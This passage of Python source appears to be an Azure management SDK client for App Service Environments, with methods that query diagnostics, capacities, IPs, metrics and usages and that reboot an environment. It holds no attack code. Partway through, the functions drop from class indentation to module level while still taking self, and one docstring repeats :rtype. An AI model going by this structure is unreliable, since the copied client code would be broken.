            deserialized = None
            if response.status_code == 200:
                deserialized = self._deserialize('object', response)
            if response.status_code == 202:
                deserialized = self._deserialize('object', response)
            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response
            return deserialized
        if raw:
            # raw=True skips polling: send once and wrap the first response.
            response = long_running_send()
            return get_long_running_output(response)
        long_running_operation_timeout = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        return AzureOperationPoller(
            long_running_send, get_long_running_output,
            get_long_running_status, long_running_operation_timeout)
    def get_hosting_environment_diagnostics(
            self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
        """
        Get diagnostic information for hostingEnvironment (App Service
        Environment).
        :param resource_group_name: Name of resource group
        :type resource_group_name: str
        :param name: Name of hostingEnvironment (App Service Environment)
        :type name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :rtype: list of :class:`HostingEnvironmentDiagnostics
         <azure.mgmt.web.models.HostingEnvironmentDiagnostics>`, or
         :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
         if raw=true
        :raises: CloudError on any status code other than 200
        """
        # Construct URL
        url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics'
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
        # Construct and send request
        request = self._client.get(url, query_parameters)
        response = self._client.send(request, header_parameters, **operation_config)
        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp
        deserialized = None
        if response.status_code == 200:
            # '[...]' deserialization target denotes a list of the model type
            deserialized = self._deserialize('[HostingEnvironmentDiagnostics]', response)
        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response
        return deserialized
def get_hosting_environment_diagnostics_item(
        self, resource_group_name, name, diagnostics_name, custom_headers=None, raw=False, **operation_config):
    """Get diagnostic information for hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param diagnostics_name: Name of the diagnostics
    :type diagnostics_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`HostingEnvironmentDiagnostics
     <azure.mgmt.web.models.HostingEnvironmentDiagnostics>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics/{diagnosticsName}',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'diagnosticsName': self._serialize.url("diagnostics_name", diagnostics_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble headers: content type, optional request id, caller
    # overrides, and the configured accept-language.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('HostingEnvironmentDiagnostics', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_capacities(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get used, available, and total worker capacity for
    hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`StampCapacityCollection
     <azure.mgmt.web.models.StampCapacityCollection>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/compute',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('StampCapacityCollection', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_vips(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get IP addresses assigned to the hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`AddressResponse
     <azure.mgmt.web.models.AddressResponse>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/virtualip',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('AddressResponse', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environments(
        self, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Get all hostingEnvironments (App Service Environments) in a
    resource group.

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`HostingEnvironmentCollection
     <azure.mgmt.web.models.HostingEnvironmentCollection>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('HostingEnvironmentCollection', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def reboot_hosting_environment(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Reboots all machines in a hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/reboot',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # POST the reboot. Per the original operation contract, 400/404/409
    # are documented responses and are NOT raised as CloudError.
    request = self._client.post(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code not in (202, 400, 404, 409):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    # Only 202 carries a deserializable payload; other accepted codes
    # yield None.
    body = None
    if response.status_code == 202:
        body = self._deserialize('object', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_operations(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """List all currently running operations on the hostingEnvironment
    (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('object', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_operation(
        self, resource_group_name, name, operation_id, custom_headers=None, raw=False, **operation_config):
    """Get status of an operation on a hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param operation_id: operation identifier GUID
    :type operation_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: object or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations/{operationId}',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'operationId': self._serialize.url("operation_id", operation_id, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET. Per the original operation contract, 404/500 are
    # documented responses and are NOT raised as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code not in (200, 202, 404, 500):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    # 200 (done) and 202 (still running) both carry an 'object' payload;
    # 404/500 yield None.
    body = None
    if response.status_code in (200, 202):
        body = self._deserialize('object', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_metrics(
        self, resource_group_name, name, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
    """Get global metrics of hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param details: Include instance details
    :type details: bool
    :param filter: Return only usages/metrics specified in the filter.
     Filter conforms to odata syntax. Example: $filter=(name.value eq
     'Metric1' or name.value eq 'Metric2') and startTime eq
     '2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
     timeGrain eq duration'[Hour|Minute|Day]'.
    :type filter: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`ResourceMetricCollection
     <azure.mgmt.web.models.ResourceMetricCollection>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/metrics',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Optional query parameters first, then the mandatory api-version.
    query = {}
    if details is not None:
        query['details'] = self._serialize.query("details", details, 'bool')
    if filter is not None:
        query['$filter'] = self._serialize.query("filter", filter, 'str')
    query['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('ResourceMetricCollection', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_metric_definitions(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get global metric definitions of hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`MetricDefinition
     <azure.mgmt.web.models.MetricDefinition>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/metricdefinitions',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # The only query parameter is the service api-version.
    query = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('MetricDefinition', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_usages(
        self, resource_group_name, name, filter=None, custom_headers=None, raw=False, **operation_config):
    """Get global usages of hostingEnvironment (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param filter: Return only usages/metrics specified in the filter.
     Filter conforms to odata syntax. Example: $filter=(name.value eq
     'Metric1' or name.value eq 'Metric2') and startTime eq
     '2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
     timeGrain eq duration'[Hour|Minute|Day]'.
    :type filter: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`CsmUsageQuotaCollection
     <azure.mgmt.web.models.CsmUsageQuotaCollection>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/usages',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Optional $filter first, then the mandatory api-version.
    query = {}
    if filter is not None:
        query['$filter'] = self._serialize.query("filter", filter, 'str')
    query['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('CsmUsageQuotaCollection', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_multi_role_metrics(
        self, resource_group_name, name, start_time=None, end_time=None, time_grain=None, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
    """Get metrics for a multiRole pool of a hostingEnvironment (App
    Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param start_time: Beginning time of metrics query
    :type start_time: str
    :param end_time: End time of metrics query
    :type end_time: str
    :param time_grain: Time granularity of metrics query
    :type time_grain: str
    :param details: Include instance details
    :type details: bool
    :param filter: Return only usages/metrics specified in the filter.
     Filter conforms to odata syntax. Example: $filter=(name.value eq
     'Metric1' or name.value eq 'Metric2') and startTime eq
     '2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
     timeGrain eq duration'[Hour|Minute|Day]'.
    :type filter: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`ResourceMetricCollection
     <azure.mgmt.web.models.ResourceMetricCollection>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metrics',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Optional query parameters first, then the mandatory api-version.
    query = {}
    if start_time is not None:
        query['startTime'] = self._serialize.query("start_time", start_time, 'str')
    if end_time is not None:
        query['endTime'] = self._serialize.query("end_time", end_time, 'str')
    if time_grain is not None:
        query['timeGrain'] = self._serialize.query("time_grain", time_grain, 'str')
    if details is not None:
        query['details'] = self._serialize.query("details", details, 'bool')
    if filter is not None:
        query['$filter'] = self._serialize.query("filter", filter, 'str')
    query['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('ResourceMetricCollection', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_web_worker_metrics(
        self, resource_group_name, name, worker_pool_name, details=None, filter=None, custom_headers=None, raw=False, **operation_config):
    """Get metrics for a worker pool of a hostingEnvironment (App Service
    Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param details: Include instance details
    :type details: bool
    :param filter: Return only usages/metrics specified in the filter.
     Filter conforms to odata syntax. Example: $filter=(name.value eq
     'Metric1' or name.value eq 'Metric2') and startTime eq
     '2014-01-01T00:00:00Z' and endTime eq '2014-12-31T23:59:59Z' and
     timeGrain eq duration'[Hour|Minute|Day]'.
    :type filter: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`ResourceMetricCollection
     <azure.mgmt.web.models.ResourceMetricCollection>` or
     :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Expand the URL template with serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metrics',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'workerPoolName': self._serialize.url("worker_pool_name", worker_pool_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Optional query parameters first, then the mandatory api-version.
    query = {}
    if details is not None:
        query['details'] = self._serialize.query("details", details, 'bool')
    if filter is not None:
        query['$filter'] = self._serialize.query("filter", filter, 'str')
    query['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')

    # Assemble request headers.
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        headers.update(custom_headers)
    if self.config.accept_language is not None:
        headers['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Issue the GET request and surface non-200 responses as CloudError.
    request = self._client.get(url, query)
    response = self._client.send(request, headers, **operation_config)
    if response.status_code != 200:
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    body = self._deserialize('ResourceMetricCollection', response)
    if raw:
        return ClientRawResponse(body, response)
    return body
def get_hosting_environment_multi_role_metric_definitions(
        self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
    """Get metric definitions for a multiRole pool of a hostingEnvironment
    (App Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :rtype: :class:`MetricDefinitionCollection
     <azure.mgmt.web.models.MetricDefinitionCollection>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
     if raw=true
    """
    # Fill the URL template with the serialized path arguments.
    url = self._client.format_url(
        '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metricdefinitions',
        **{
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        })

    # Only the api-version query parameter is needed for this call.
    query_parameters = {
        'api-version': self._serialize.query("self.config.api_version", self.config.api_version, 'str'),
    }

    # Assemble request headers; caller-supplied headers override generated ones.
    header_parameters = {'Content-Type': 'application/json; charset=utf-8'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Send the GET request and validate the response code.
    request = self._client.get(url, query_parameters)
    response = self._client.send(request, header_parameters, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('MetricDefinitionCollection', response)

    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
def get_hosting_environment_web_worker_metric_definitions(
        self, resource_group_name, name, worker_pool_name, custom_headers=None, raw=False, **operation_config):
    """Get metric definitions for a worker pool of a hostingEnvironment (App
    Service Environment).

    :param resource_group_name: Name of resource group
    :type resource_group_name: str
    :param name: Name of hostingEnvironment (App Service Environment)
    :type name: str
    :param worker_pool_name: Name of worker pool
    :type worker_pool_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
